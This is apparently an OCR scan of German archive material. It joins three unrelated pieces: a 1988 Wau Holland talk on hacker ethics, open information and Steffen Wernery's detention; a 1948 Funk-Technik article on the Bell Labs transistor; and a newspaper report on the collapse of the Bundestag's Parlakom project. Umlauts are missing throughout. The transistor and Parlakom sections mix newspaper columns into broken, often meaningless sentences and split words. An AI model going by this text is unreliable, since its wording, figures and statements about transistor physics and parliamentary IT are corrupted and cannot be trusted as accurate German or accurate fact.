Entwicklungen laufen. hier eingeschoben, um

Von unserem Rangehen haben wir das Prinzip der mglichst groen Offenheit. Wir gehen davon aus, da ~ nach unseren Erfahrungen -- alles was rauskommen kann, auch irgendwie rauskommt. Und da ist es besser, man ist da von vornherein so klar, da man sich dazu stellt. So ranzugehen ist ein Stck auch unserer Erfahrung aus dem Bundestag in Bonn. Da hat einer von uns den Satz geprgt: "Der Staub in den Archiven ist der Sprengstoff von morgen". Selbst wenn man bedenkt, da solche Verffentlichungen wie die jngsten zum Atomskandal in Sellafield nach Ablauf der Archivfrist verhltnismig wenig Staub aufgewirbelt haben. Der Satz ist trotzdem richtig. In dem Sinne: bewut mit Datenbanken umgehen. Angucken, wo man irgendwie Informationen rausfinden kann. Fr mich das wichtigste ist da, mit offenen Augen durchgehen. Da stellt man auch mal, meinetwegen bei einer Besichtigung vom ZDF. fest, da es unterhalb des Atombunkers noch ein Stockwerk gibt. Und da man dann den Eindruck hat, sich irgendwie jetzt nicht unter dem Atombunker zu befinden, sondern vielleicht auf einem zentralen Nachrichtenknoten, der noch unterhalb dieses Stockwerks unten drunter ist. Ist ja irgendwie... irgendwo mssen derartige Installationen ja auch gemacht werden. Und wenn man schon so einen Datenknoten in Mainz hat... naja, unvernnftig wrs nicht. Ich habe noch zwei, drei Bcher, die ich wichtig find. Das eine ist der Schockwellenreiter von Brunner. Die erste Auflage hatte auf dem Rcken hinten stehen "Das Stahlnetz stlpt sich ber uns". Und war eine Replik auf eine Spiegelserie der siebziger Jahre ber die Entwicklung hin zum berwachungsstaat. Das Ding war irgendwann vergriffen. Wir haben auch per Bildschirmtext rumgemotzt gen Heyneverlag; etwa: "Zensur gibt es nicht, aber kaufen kann man es nicht mehr". Dann dauerte es ein viertel Jahr, und dann kam die zweite Auflage raus und auf der Rckseite stand auf dem

jwijuso.txt

880519

Klappentext: "Militr gegen Hacker" - als Aufmacher. Das ist bezogen auf den Inhalt von dem Buch auch zutreffend, aber ich hab in der Situation einen Schreck gekriegt. Tja, und wenn ich mir das so anguck: das, was mit Steffen jetzt passiert, ist ein stckweit eine Konsequenz von dem, was in dem Buch beschrieben wird. Da sind eine Menge von gesellschaftlichen Situationen beschrieben, wie sie sich hier entwickeln. Dort habe ich auch das erste mal eine besondere historische Darstellung gefunden -- man kann Science Fiction auch vergangenheitsbezogen lesen. Im Schockwellenreiter steht eine kurze Notiz, so fnf Stze zum Thema Chile drin. Stafford Beer, ein britischer Kybernetiker, der Berater von Allende war, hat versucht, ber gesellschaftliche Datenkontrolle und freien Zugang zu Informationen die Volkswirtschaft besser zu managen. Kurz: die Betriebe haben die Pflicht zur Informationsabgabe und das Recht, die Daten gesammelt zu kriegen. Ich wrde mich zum Beispiel bei der Volkszhlung beteiligen, Gesamtergebnis komplett auf CD-BOM kriegen knnte. wenn ich das

Und als Stafford Beer in Chile diese Sachen versucht hatte voranzutreiben und anzugehen, da kamen die Amis, wurde Allende umgebracht und das Experiment beendet. Da wurde es denen zu brisant. Und ber diese Entwicklung nachzudenken, inwieweit das heute wieder ansteht, hier in der Bundesrepublik ist ein guter Platz fr sowas, da ist ein stckweit meine Utopie. Im Schockwellenreiter steht dabei, da dieses Rangehen einige wtend gemacht hat wie die Entdeckung, da die DNS sich aus Grundbestandteilen zusammensetzt. Die Geschichte, die auf der Gentechnikseite auf uns zukommt... In diesem Sinne mchte ich nicht nur auf Steffen weisen, sondern auch a u f Ingrid Strobl und Ulla Penselin, die zur Gentechnik arbeiten, also einem anderen brisanten gesellschaftlichen Gebiet neben Computern und hier in der Bundesrepublik einsitzen. Das ist ein anderes gesellschaftliches Kampffel^ wo es um eine positive oder negative Utopie geht. Bei der Gentechnik ist eine gewisse Kluft zwischen Forschung und Lehre bei der katholischen Kirche oder den Jesuiten, wie Heiner Geissler ja auch irgendwie aus der Ecke kommt, so, da die kirchliche Forschung siebzehnhundertsechsundsiebzig in Italien erstmals eine Hndin knstlich befruchtet hat. Das ist das Wissen der katholischen Kirche um die Fortpflanzung. Aber noch jetzt werden Lehrer, Professorinnen der katholischen Kirche entsprechend gemaregelt, wenn sie andere als die amtliche Fortpflanzungsgeschichte erzhlen. Diese Kluft von 1 9 8 8 1776, die versuchen wir zu verkrzen in der Wissensweitergabe. Zu den Negativismen, die - auch - aus der Gentechnik mir vorstellbar sind, da gibt es ein zweites Buch: Neuromancer von Gibson. Es lt sich lesen als NeuroMancer oder NeuRomancer. Er schildert eine gesellschaftliche Entwicklung, wo der Tod insofern abgeschafft ist, als Gehirn und Rckenmark irgendwie mit Nebenanschlssen an Computern weiterhin gelagert werden knnen und die kleinen Gnome vom Zriberg auch auf Dauer noch irgendwelche Konzernherrschaften bernehmen knnen. Wo mensch sich nicht mehr mit den Fingern ber Tastatur in eine Datenbank einklinkt und mit den Augen auf den Bildschirm guckt, sondern quasi verkabelt ist mit dem Datennetz. Und bestimmte Informationen direkt in den brain reinkriegt. Leute so nur fnf

jwijuso.txt

880519

Da ist das Umgehen mit Hackern dann so geschildert: wer sich da in unerlaubte Gebiete vortastet, riskiert gleich einen Gehirntod - ber die elektrischen Impulse aus der Datenbank. Ein Freund von mir hat das Buch gelesen und spontan gesagt, er habe den Impuls gegen dieses Buch ein anderes zu schreiben, weil er das so schrecklich findet. Aber ich empfehle es, weil es notwendig ist, auch vor irgendwelchen schlimmen und schlechten Sachen nicht die Augen zu verschlieen, sondern hinzugucken, was da laufen knnte. Und um fr den eigenen Weg, die eigene Richtung eine gewisse Klarheit zu kriegen, wohin sich entwickeln und was mensch machen will. Als eine Forderung: wir wollen die Tele-Kommunikation, die Kommunikation billiger machen und fordern dafr die Nutzung der Datenfreizeit auf den internationalen Standleitungen. Das ist etwas, was Hacker praktizieren. In diesem Sinne haben wir uns auch bemht, in den englischen Sprachraum hinein den Begriff Data-Travellers zu tragen: "Datenreisende". Die Datenschleuder heit "Das wissenschaftliche Fachblatt fr Datenreisende", weil wir schon vor lngerer Zeit befrchteten, da der Begriff Hacker von Leuten, die unsere Art des Rangehens versuchen zu kriminalisieren, immer mehr entwertet wird und wir von daher eben einen Ausweichbegriff brauchten. Das auch als eine Richtung von unserem Vor- und Rangehen. Und in diesem Sinne bemhen wir uns um die Aufzucht und Pflege von der Verbreitung ffentlichen freien Wissens. Und diejenigen in den Jusos, die aufmpfig genug sind, gegen die...; auch in der Partei gegen den Stachel zu locken, und dieses Wissen ebenfalls verbreiten wollen - und das tun wollen zusammen mit anderen, die an dieser Aufklrung interessiert sind, die werden feststellen, da es effektiv ist, da: kooperativ zu arbeiten: mit allen, die die gleichen Ziele haben. Und da das nur parteibergreifend geht. Das ist mein Beitrag zum Thema. Auf der Veranstaltung wurde von allen Anwesenden einstimmig eine Resolution zur sofortigen Freilassung des Journalisten Steffen Wernery verabschiedet. Die ordnungsgem verabschiedete Juso-Resolution wurde vor Verffentlichung von zumpfigen Parteileichen ausgebremst. Steffen Wernery wurde inzwischen ohne diese resolute Untersttzung nach 67 Tagen Haft freigelassen.

1988 Wau Holland * Abdruck honorarfrei bei Quellenangabe (Krzungen nur nach Absprache) und Bezugshinweis auf die Datenschleuder, Das wissenschaftliche Fachblatt fr Datenreisende, Schwenckestr. 8 5 , 2 HH 20) und Zusendung von fnf Belegexemplaren nach Erscheinen. wyg2:e:archiv:stve:jwijuso.doc Korrektur 2 7 . 5 . 8 8 18:23

Eingang

Ausgang

Steuerstrom infolge v e r n d e r l i c h e r - j ^ . den ganzen Leiter gleichkommt. Da jede regung schwankt. I m A u s g a j i g - s . i t r e j S i Elektronenschale vom Atomkern aus gesehen ein bestimmtes Energieniveau darstellt, darf der durch diese Zone vernderlich.esr- L e i t man sich die ueren und ftlr die Leitfhigkeit fhigkeit von K o n t a k t B zu K o n t a k t A magebenden Schalen in einem Metallkristall fhrt, lat sich dann m i t e i n e n Im zu durchlaufenden Energiebndern zusammengesetzt denken; in diesen geht die Elektronen- Eingangskreis liegenden berla.g-.erfcen verschiebung (Stromilu) vor sich. Kein Steuerwechselspannung untier d e r WirElektron darf sein Band ohne weiteres verk u n g einer eigenen etekbrom.otoirisieh.eB lassen. Nur wenn ihm von auen Energie K r a f t ein Strom berhhter A m j > l t f c m l e angefhrt wird, kann es auf ein hher gelegenes erlaubtes" Energieniveau bergehen, gewinnen. das gemil der Energiequantelung vom ersten D a s v o n Bell .geschaffene V c r s t a . r k . e r Band durch einen fr Klektronen verbotenen" Germanium- Hercicli getrennt ist. Der Physiker nennt elemcnt wird seiner negativen. W i ^ . Kontakt einen s'olchen Fall einen angeregten Zustand standscharakteristik wegen T r a n . federn Block des Atoms. s i s t o r " genannt. E s zeigt e i n e S c h a l Halbleiter sind als Stoffe anzusehen, bei tung nach A b b . 3 und liefert e i n e - V e r denen im gewhnlichen Zustand nur sehr strkung von e t w a 1 : 100, e n t s p r e c h e n d wenige frei bewegliche Elektronen vorhanden sind, etwa nur eines auf 1 Million Atome. 20 Dezibel. D a s verwendete S t c l t c h e B Whrend aber bei guten Leitern und auch bei A u f b o u des Transistors, DurchGermanium es sind .auejh. a n d e r e H a l b Nichtleitern die . Zahl der beweglichen Elekmesser c o . 4,7 mm, L n g e 15,8 mm leiter brauchbar ist in einer i c L e m e i . tronen kaum zu beeinflussen ist, kann bei Halbleitern leicht erreicht werden, da sie MetaUhtse gefat, die einen u a - c h Nachdem die Entwicklung dieses neuen sich durch Anregung, d. h. berfuhren einmesser von einigen Millimetern h a u t u n d Sclmltelcmentes bereits vor einiger Zeit zelner Elektronen auf ein hheres Energienicht ganz 25 m m lang ist. D i e tyeclieii bekanntwurde, Kind jetzt in den ausband, um das lOOOfache vermehren. Die Folge Kontaktepitzen (Wolfram) s t e h e jw. lndischen Fachzeitschriften genauere davon ist bessere Leitfhigkeit, weil im anUM Unterlagen ber die Gcrmanium-IIalbgeregten Zustand das normale untere EnergieAbstand von nur 0,05 m m n e b e n e i n lelter-Triode enthalten. W i r mchten unband und das erlaubte hhere nur teilweise ander. ser,-n I^-sern die neueste Erfindung nicht mit Elektronen besetzt sind (s, Abb. 2). Bisher wurden Transistor-Ve.rstii.rkervorenthalten und bringen im folgenden tDie wahren Verhltnisse in Halbleitern, die eine Erluterung der Einrichtung, der gewhnlich durch Fromdatome verunreinigt elemente entwickelt, die b i s z.U. e i n e r u. IL eine gro/)e, wenn nicht sogar umsind, stellen sich etwa vei-wickelter dar. Das Frequenz von 10 M H z g o a i g n e t s i n , ^ . Ihr wiil/.ende Jiedeutung zukommt. hier entworfene Bild mag jedoch gengen, elektrisches Verhalten weicht v o n . <ieitl um eine Anschauung" vom Wesen des HalbBei der Erforschung- des Verhaltens von lciter-LeUvermBgens zu jreben.) einer Elektronenrhre e t w a s at>. j>j e Halbleitern, die In dar Funktechnik Eingangsimpedanz ist niedrig(etwa F r den Gcrmaniumkritetall in der A n wegen Ihrer bekannten Gleichrichtcr1000 Q) und die A u s g a n g s i m p e d a n z h o c l i wlrkung (DeLektor, Sperrschlchtgleich- ordnung gemii A b b . 1 darf man sich (einige 10 000 ft). D i e L e i s t u n g s a u f vorstellen, da durch die angelegte richter) seit langem eine gewisse Rolle Steuerspannung zwischen der zugehri- nahme bewegt sich u m 50 m W . ( B e i d i e s e n Angaben handelt es sich u m y J( .. spielen, stie eine Arbeitsgruppe der gen Kontaktspitze und der B a s i s eine stimmte A u s f h r u n g eines G e r r a E L n i u m Bell-Laboratorien, bestehend aius D r . Zone entsteht, in der die Leitfhigkeit Verstiirkers.) Der Transistor s o l l I m . B e J o l m Barden, D r . Walter B r a t t a i n und mit der steuernden Spannung oder dem reich zwischen 50C-und + 50 c - ^ ^ Dr. William Shockley, auf einen bisher temperaturabhngiges V e r h a l t e n unbekannten E f f e k t : f frai.'bfpr. obtr Konwktspitien Elektrische Stabilitt, R o b u s t h e i t {normalerweise Wird an ein GeiTnanhunkrisl oder geU t l ~' -ri Irr Lebensdauer sollen hnlich sein. [unbesetitfr Perrich. wisse andere Halbleiter mittels einer v v i e bei Verbotener Berdel) guten Kristalldetektoren feinen Kontaktspitze eine Spannung anE i n stromsteuerndes HatbleitereJ. gelegt, so verndert der Kristall in engI normalerweise kann auch zum A u f b a u trines O s z i n 1 * 1 6 1 1 * < voll besei:ter ster Nachbarschaft der Kontaktstelle ||,Sfre/fA dienen (Abb. 4). I n .diesem P a y rS seine Leitfhigkeit je nach der Gre Keine titlbigkeit. Leilltigkeitn - und Ausgangskreis als g e k o p . r f ^ Ei des Spannungswertes. Wenn, der s o auf ic unteres [nerqit- da beide IStSchwingkreise ausgebildet. -y-Peite band voll u. oberes dir teilweise Leitvermgen steuerbare Kristall in H'P I unbesetzt. besetit. Die erste Vorfhrung von T r a n s ^ einen zweiten Stromkreis gelogt wird, Sttucrsponnung Strom Elementen und damit a u s g e s t a t t e t e ^ T (Eingang) de.r den ersten Kreis erweitert, Laasen Ausgang! ritte fand im Sommer 1948 statt. * sich mit kleinen Schwankungen der G) Stouerspannung im ersten Kreils groe Auf Grund der wenigen bisher v e r f f e n j . Uektranen Hektronen nderungsbetrge des Stromflusses im lichten AJigaben ist anzunehmen, lsender1 r-treibender zweiten Kreis erzielen (s. A b b . 1). D e r der Transistor in einem b e t i r r u ^ j . ^ Konhkt 1 Kwtakl 1 Halbleiter zeigt also einen h n l i c h e n Bereich einfacher Zweckbetini, r r L T 1 _ p. Verstrker mcchanismtis wie tatschlich geeignet ist, die E i ^ ^ eine g l t t e r g e s t e u e r t e ElekIrwenrlire zu ersetZe]1 tronenrhre in Verstrkerschalkeineswegs aber berall! Viel w i r d lung. von abhngen, ob die S t o e m p f i m m ^ Die E r k l r u n g fr diese Erscheinung keit gering genug ist, um die l e k - t r i s ^ j ^ liefert die Energiebandtheorie der E l e k Stabilitt hinreichend konstant zu h a i t e n tronenleifimg jn festen Krpea-n, aus der I n dieser Hinsicht wird von den. ^ ^ auch die Gleichrichter-Wirkung von Laboratorien selbst zugestanden, d a ^ Halbleitern zu verstehen ist. Herstellungsprobleme noch nicht v 0 U g e . E m fester Itorj'cr ist Icitfilhig, wenn die A b b . 1. D a r s t e l l u n g d e r V e r s t r k e r w i r k u n g e i n e s ueren Kickt ronensrhalen seiner Atome nicht lst sind. Germaniumkriif alles

-Halffaki a

i/m+Mk&v

voll. d. h. mit weniger als acht JCleklronen besetzt sind, bzw. wenn .sich die Aii.'nelcktronen seiner Molekle nicht zu vollen Schalen ergnzen, Die ueren Elektronen sind dann, wio CS bei den meisten Metallen der Fall ist. frei beweglich in (lern Sinne, da einen davon zum Nnchbaratom hinberwechseln kann, von diesem eines zum nchsten usw., was einem Transport elektrischer Ladungen durch

A b b . 2. F n e r g i e b c n r i s c h e m a f r e i n e n H a l b l e i t e r , l i n k s : u n a n g e r e g l e r Zuslanci o h n e teiffhrgVeii. Rechts: angeregter Zustand mit teitfhigkeit i n f o l g e Elekfrontjnverschiebung im o b e r e n und i n f o l g e LcVonverschiebung im u n t e r e n B a n d A b b . 3 . G r u n d s t z l i c h e S c h a l t u n g oinos H a l b l e l f e r Verslrkers A b b . 4. G r u n d s t z l i c h e S c h a l t u n g eines H a l b l e i f e r -

Zum er sten Male, seitdem der e i n i a e h e Detektorempfnger wogen seiner ^ zulnglichen Leistung in den H b j t e j v grund gedrngt wurde, ist jetzt rhrenla^e Hochleitungsempfangc* ^ den Bereich des Mglichen g e r u c k t !
w

Oszillators

- R. S.

P U N K - T E C H N I K Nr. 2 4 / 1 9 4 g

TRANSISTOR.
Der unter diesem Namen von den BellLaboratorien in New Y o r k eingefhrte Kristall-Verstrker hat uerst geringe rumliche Abmessungen. E r bentigt keine Heizstromquelie und hat auch kein Vakuum. In den Bereichen, in denen diese Halbleitertriode die herkmmlichen Elektronenrhren ersetzen kann, bieten sich deshalb bei der Verwendung dos Transistors bestechende Vorteile. Sofortige Bctriebsbercltschaft ohne A u f heLzungsperiode und die etwa 10 bis 20 mal so lange Lebensdauer wie bei normalen Radiorhren sind nur einige der Faktoren, die zusammen mit dem sehr kleinen Raumbedarf eine Vielzahl von Anwendungen ermglichen. Bei der erstmaligen Vorfhrung dieses Transistors wurde ein normaler 10Rhren-Supcrhet gezeigt, in dem smtliche Rhren durch die HalbleitcrTrloden ersetzt waren. I n Abb. 5 ist die Schaltung eines solchen rhrenlosen" Gertes skizziert. M a n erkennt, da ein derartiger Empfnger auerordentlich, einfach aufgebaut werden kann, und der deshalb evtl. auch in Verbindung mit gedruckten" Schaltungen wahrscheinlich zu einem verhltnismig niedrigem Preis herzustellen ist. Immerhin steht man erst am Beginn dieser neuen Entwicklung und vorlufig

Halbleiter-Triode. Der Eingangsstrom durch den elektronenlsenden. Kontakt A ist nherunigsweise durch IE
= f (U
E

IA)

stellt die bis jetzt erreichte Ausgangs- beschrieben. Hierin ist R eine von der unabhngige Konstante leistung von 25 ... 50 mW noch eine ge- Vorspannung wisse Grenze dar. E s sind jedoch schon und der Ausdruck R I A kennzeichnet einige Verstrker aufgebaut worden, die einen Rckkopplungsfaktor, der ggf. zunchst die grundstzliche Eignung des Unstahilltten hervorrufen kann bzw. z;ur Transistors bewiesen. Fernsprechv-er- Anfaehung von ungedmpften Schwinstrker, Apparate fr Schwerhrigen- gungen auszunutzen ist. Gerate und Ferxiseliz wischen verstrket' Nach den bis jetzt bekannten Betriebswurden mit den entsprechenden Prf- bedingungen wird die Vorspannung TJ^ gerten durchgemessen und es konnten des elektronentreibenden Kontaktes B die geringen Verzcrrungseigenschaftcn so eingestellt, da sich ein etwa gleich und der im gegebenen Bereich groer Strom wie auf der EUngangsseite groe Frequenzumfang der Transiator- ergibt. U A liegt etwa in der GrenGerte festgestellt werden. ordnung von 45 V, und nach Abb. 8 Abb. 6 gibt einen Grenvergledch zwi- ist somit analog zu den Verhltnissen schen einem Zndholzbriefchen und bei Elektronenrhren edne Steilheit von einem Transistor-Tongenerator. Dieser ca. 6 m A / V zu definieren. Wie jedoch Oszillator erfllt die gleichen Aufgaben aus dem Kennlinienfeld zu entnehmen wie ein entsprechendes Rhrerigcrt. ist, hng't .die wirksame Steilheit stark Die ganze Kapsel ist nicht grer als von den angelegten Spannungen ab, und ein Rhrensockel und enthlt den Trannach den bisherigen VcrffcntUchungcn sistor, einen Transformator und je zwei ist die Verstrkungsregelung durch eine Widerstnde unci Kondensatoren. Die Vernderung der geringen positiven Vorvier Steckerstifte dienen in bekannter spannung weitaus wirksamer als bei den Weise zur Verbindung mit den bentignormalen Trioden. C. M. ten Batterien und zur Herstellung- des l'j i t o r a t u r h i ii w c i 3 : P h y s i c a l Review Masse- sowie Ausgangsanschlusses.
Juli 1948; 128 19 . Audio-Engineering 1948). 1948), S. 25S; 12, S. S. JulUAugust Radio 24; Craft la

hnlich wie bei einer Elektronenrhre lt sich auch beim Transistor das elektrische Verhalten an Hand von Kennlinien bersehen. Abb. 7 und 8 zeigen einige typische Kennlinienfelder der

19-18; E l e c t r o n i c s A u g u s t 1948; T o u t e l a R a d i o Nr. Ed. (Sept. (Sept. Nr, Nr. Wirelcss Radio

W o r l d Bd. Radio Tcchik

54 (1948), N r . 123 (Okt.

10, S, 358; T o u t e 28S; 503.

1948),

(19-1S), !Cr. 10, S .

3>i imH

Abb. 7 A b b . 6. Dor Transislor-Tongcnerator im Rhrensockel

(rechts).

Gleichitrom-Kennlinienfeld variabel, Spannungen Slatischos"

des

Iransistors. eines

(Strme

unabhngig

abhngig

vernderlich.) Transistors

A b b . 8 (links).

Kennlinienfold

GL

NF1 NF2 NF3

Gegentakt

+ /

-15*1

-15*1

-Ii

*1

-IS

A b b . S . G r u n d s t z l i c h e s S c h a l t b i l d des 10-Rhrcn"-Supcrhets, d e r mit Transistoren bestckt v o n d e n Bell-Laboratorien vorgefhrt wurde

> r m b H T U N i r c - T K C H N I I C e r s c h e i n t m i t G e n e h m i g u n g d e r f r a n z B s f s c h e n M l l l t l l r r o i r l o r u n g . M o n a t l i c h i i e r t e V e r l a n - W e r iarat lnn V e n n IC B Mllerutr. In. Reduktion Berlin-Borsigwalde, Ktchborndamm i ' c l 40 Gr. h o ^ , . A ; ,Y,e ' E-Vcrlag " Berli u m n N U , Mmierai (einschlielich 0 P f . PoMKebUhrcnJzu^Ur-lich p r L C , " ! W S r : C u r t H l n l . Bezugspreis monatlich DM 4 ."TH W O L F L L ^ monatlich kaviert, B e S t e l l u n g e n beim J J O A|'1|m"ementsgebUhren erden innerN a C h d halb Oroli Berlins ^ ^ ^ ^ ^ Genehmigung^ V e r d e s t T ^ ' K " ^ Ck n u r m i t

Parlaments-Kommunikation Schach-Matt gesetzt


Alle Fehler bei Parlakom voll ausgeschpft
V o n unseren Redakteuren R a l f Kellermann und R . U w e Proll
Die Bundestagsabgeordneten werden nun doch bei ihrem Umstieg aus der Postkutsche in den i n f o r m a t i o n s t e c h - 1 u m s t n t l c n U n s t i m m i g k e i t e n h a t t e nischen D-Zug einen Zwischenaufenthalt einlegen mssen. Das Scheitern des Pilotprojektes Parlakom ist " zwischen den F r a k t i o n e n vor mittlerweile amtlich besttigt: in einem internen Kundschreiben hat Bundestagsdirektor Dr. Joseph Bcker die a e m b e i d e r Frage g e g e b e n , o b es Versuchsphase als gescheitert bezeichnet. D a b e i war die Verwaltung des Deutschen Bundestages mit grollen e m e i n z , E e s InformationsA m b i t i o n e n gestartet. P a r l a k o m sollte zugleich ein Vorbild herstellerunabhngiger Beschaffung und offener K m m u n ' k a t i o n s s y s t e m geben te o b Systemarchitektur nach dem OSI-Standard werden. D i e Leitlinien des Projektes legte eine Studie der ' Jcc,c F r k t i 0 n c i n Gesellschaft fr M a t h e m a t i k und Datenverarbeitung ( G M D ) fest, die bereits im Vorfeld ein Anforderungsprofil .Z e i " n c h t e t ; D i e F ^ . hinsichtlich Datenschutz und -Sicherheit, S c h u l u n g , Leistungsfhigkeit und Qualittsmerkmalen des Equip- j ! " " S * e " t r a v " k a t t c n s l c h ^ r n l i c h U n d ments erstellt. Alles wollte m a n besser als andernorts in der ffentlichen Verwaltung machen, doch das Ergebnis arbeite^)" a u f ' s " ' ^ ^ R c c ist am Ende ein Desaster, wie es noch keine Verwaltung alleine fertiggebracht hat. Der de-iacto Abbruch der w h r e n d di" C D l H r s ^ncrn, a u f informationstechnischen (IT) Aufrstung des Parlaments fhrte zu allem berflu zu neuen Kuriositten. D e r eingeschworen i ^Vang 1 Haushaltsausschu beschftigte sich mit der IT-Schlappe, sperrte d a n n jedoch allen Bundesressorts vorerst 2 0 % ' der IT-Haushaltsmittel. Gemeint knnen die Volksvertreter nur ihre eigene Administration und auch sich selbst E ; n e Studie der 'I haben, V s t r a f t ' haben sie nun aber andere, die Bonner Ministerien und den nachgeordneten Bereich. Beratungsgesellschaff 0 " Fiir sich selbst haben die Haushltcr eine Interimslsung von Siemens ins Auge gefat (siehe hierzu eigenstndiger Artikel). Fr die Abgeordneten-Kollegen und deren K o m m u n i k a t i o n mit der Verwaltung ein es erstmal auf hergebrachte Technik zurck: Telefax und Teletex. Die Bundespost - modernistischen Vokabeln bedeuten einfach Fernkopierer lind elektroisch aufgcniotzer Fernschreiber iche hierzu eigenstndiger Artt:cl). Helfen soll eines Tages das x- DO Protokoll, eine Software-gc , .tzte Kompatibililiitsrcgching/ur Tienile verschiedener Hersteller, mit deren Betrieb frhestens Mitte 1989 zu rechnen ist. Fr die meisten zu Beginn gestarteten 17 Interessenten kam jedoch bereits nach einer ersten Sichtung der Angebote aufgrund mangelnder Qualitts- und Leistungsmerkmalc das vorzeitige Aus. Lediglich Nixdorf, W a n g und Siemens konnten sowohl stand-alone PC's als auch ein Mchrplatzsystcm im Bundestag plazieren. Die Parlamentarier hatten daher nur noch die W a h l zwischen dem W a n g A P C , dem Nixdorf Micro 3 (im Wahlkreisbro) bzw. dem Micro 4 (im Bonner Bro) oder einem Siemens PC-D. Jeder zweite Abgeordnete wollte jedoch lieber an einem Siemens Brosystem 5800, einer Nixdorf
U n d

nicht. Ein schlechtes Vorbild fr die ( I B E K ) s o w i e einer a l t c r n a t " 1 1 * 0 ' gesamte ffentliche Verwaltung, H a m t>Urger G r u p p e , der auc-H .. . , ,.. . *-n iviitdenn alle Parteien weisen unermd- S , i e c J e r des einschlgig b e l c a n lieh ffentlich auf die B e d e u t u n g | ' C K a o s Computer C l u b ' a n o ^ " h o r der Mitbestimmung bei der E i n f h - j t e n ' k m r n t da zu g a n z " a ^ E rung neuer Technologien hin. Nurl 5.bnissen' S i e empfahlen edie Grnen hatten bereits im Vor-| n e K o m m u n i k a t ' n s e i n h e i t , . X n Z e I5" Fraktionen mit eigenem * die'
z und eigener Netzkontrolle z o j t a von Umstritten war das -P ru se k tt t e n . Beginn a n bei d e n G r n e n . S e l b s t von den kritischen B e f r w o r t e r n nun in Form einer stand-alone L sung akzeptiert, verzichtete d i e P a r tei Ende 1986 ganz auf die Teilnahme.

Vor allem aber das K o n z e n , Privatwirtschaft liehen


lu

.
d e r

Abgeordnete auf der EDV-Schulbank im Parlakom-Schuhmg^^um ik-s Bundestages. im Bild vorne rechts Dr. Peter Mitiseherling (SPD Berlin) und hinten links Karsten Vogt (Frankfurt).
8860 Konfiguration oder einer

treu n

du ch d ADV ^8 ^ ^r -Orgn ' keine Frchte. Offensichtlich P ren

erbe^

W a n g U S 65 Anlage arbeiten. G a n z glcklich wurden die parlamentarischen Tester jcdoch nicht mit ihren neuen Arbeitshilfen. Das Nixdorf

viele der Volksvertreter mit dem notwendigen Ernst b e ? ^ 1 d c r die S P D zog spter mit Sache. Die Kosten werden 'Dienstvcrcinbarung' nach, allerbeteiligten U n t e uciime: e n ^ ^ rnehm dings erst nachdem die Mitarbeiter auch die Bundestagsverwaltu n im Dezember 1986 eine Art Streik t e r der R u b r i k Erkenntnis v ? } ! " " organisiert hatten. chen mssen. Das Zauberwort im H o h e n H-> Daten-heit n u n x ^ 0 0 P r o l o k M 1 "

Auch

der

unabhngige

schutzbeauftragte-, den die Kom- Software-Lsung, von der

.O

HAI

s 8 -

il II
Welt-Centrum Bro

s j . ich W u n d e r erhofft, ist m der L a ge d Cln K o m m u n i k a t i o n unterschied!;-. h e r Wunsch. M a n k o n n t c s i c h nicht auf Systeme zu gewhrleisten, die notwendigen Kontroll- und Problem die internationalen D a s Entscheidungsbefugnisse sowie mierungsgremien formulieren *N o n 0* ber die Personalausstattung cini bis mindestens Herbst 1988 C

mission des ltestenrates empfoh hatte, blieb lediglich

len

gen. Stattdessen wurde cin Daten- neuen Standard. D a n n erst w e r j " 1 schutzgremium eingesetzt, dem ne- die Hardware-Produzenten ten Fraktionen ein Mitglied der wird also noch dauern Gerif" pC
a]

ben je einem Vertreter der beteilig- umstellen und liefern k n n e n .

16. - 23
V'/

.. Parlakom ist gescheitert", so Bundestags- Direktor Dr. Joseph Bcher im Rundschreiben. Hier mit Prsident Philipp Jenninger. Foto:

bis ' pj

,S

Bundesverwaltung angehrt. Auch MdB's a u f die mittlerweile die gesamte Konzeption des offe- beliebten Schachspiele und

schQC

nen Netzes war von Anfang an zeugsimulationen Zugriff e r h a l t e ^

Interimslsung fr Haushaltausschu
Siemens vermietet Provisorium
B S / r u p ) Offiziell als Bestandteil von P a r l a k o m w e n n er Versuch des Parlaments elektronisch zu k o m m u n i z i e r e n a u c h vorerst suspendiert ist hat S i e m e n s es geschafft d e m H a u s h a l t s a u s s c h u eine provisorische Kommunikationseinrichtung zu verkaufen. Jhrlich fallen hierfr 130.000 D M z u z g l i c h f r P e r s o n a l k o s t c n 190.000 D M a n . D a m i t der H a u s h a l t s a a s s c h u aber a u c h die H a u s h a l t s r e f e r a t e der einzelnen Ressorts erreichen k a n n , mssen diese m i t weiteren K o s t e n v o n fas einer iialben M i l l i o n M a r k rechnen. Vorgesehen ist, d a der H a u s h a l t s a u s i t h u die T a g e s o r d n u n g in die einzelnen B r o s der H a u s h l t e r elektronisch versenden k a n n . D e r Rest der K o m m u n i k a t i o n zwischen B u n d e s m i nisterien, insbesondere d e m B u n d e s f i n a n z m i n i s t e r i u m , d e m ten soll mit Teletex der Bundespost erledigt werden Bundesfihierzu n a n z a m t sowie d e m B u n d e s t a g u n d den W a h l k r e i s b r o s der A b g e o r d n e (siehe esonderten A r t i k e l ) .

Vuch die Ressorts mssen krftig l a c h r s t e n , d e n n i m Regelfalle vergen die B o n n e r Ministerien jeveils n u r ber einen Teletex-Anc h l u . bis J u n i soll hier nachgechafft werden. Verschlusachen Verden v o n dieser K o m m u n i k a t i o n tusgeschlossen. Das schmale Ziel dieses Provisoi u m s soll sein, d a die M i t g l i e d e r !es Haushaltsausschusses JVahlkreisbro b e r sowohl iuf ihrem Bonner- wie auch i h r e m Datex-P-Leiu n g e n m i t i h r e m Teletex-Gert die kusschuunter lagen, Protokolle, Beschlsse und Tagesordnungen sind. tbrufen k n n e n , die in der Siemens S-2000-Anlage gespeichert \us d e m Bundesinnenministerium

H a u s h l t e r Einsicht in die Landeshaushalte. Z u r Verschiebung von A u s g a b e p o s t e n m u er E i n b l i c k in alle Einzelheiten h a b e n k n n e n u n d dies auch den den rckwirkend. Nur ein an groes wehplatzfhiges System fr Ausschu angeschlossen wre Grorechner sinnvoll.

M i t der jetzigen L s u n g ist zwar eine luxerise Bequemlichkeit u n d ein weiteres I m p o n i e r g e r t in den Abgeordneten-Bros z u n g eines geringen angebotes m g l i c h . E i n f a c h e r h a t da der Forschungsausschu des Bundestages, dessen Mitglieder v o m gleichen Hersteller P C ' s zur V e r f g u n g gestellt bekomm e n haben. A b g e o r d n e t e Ausschsse groe Sachen vermuten anderer der in schon, sicher, doch gleichzeitig eine n u r passive NutInformation-

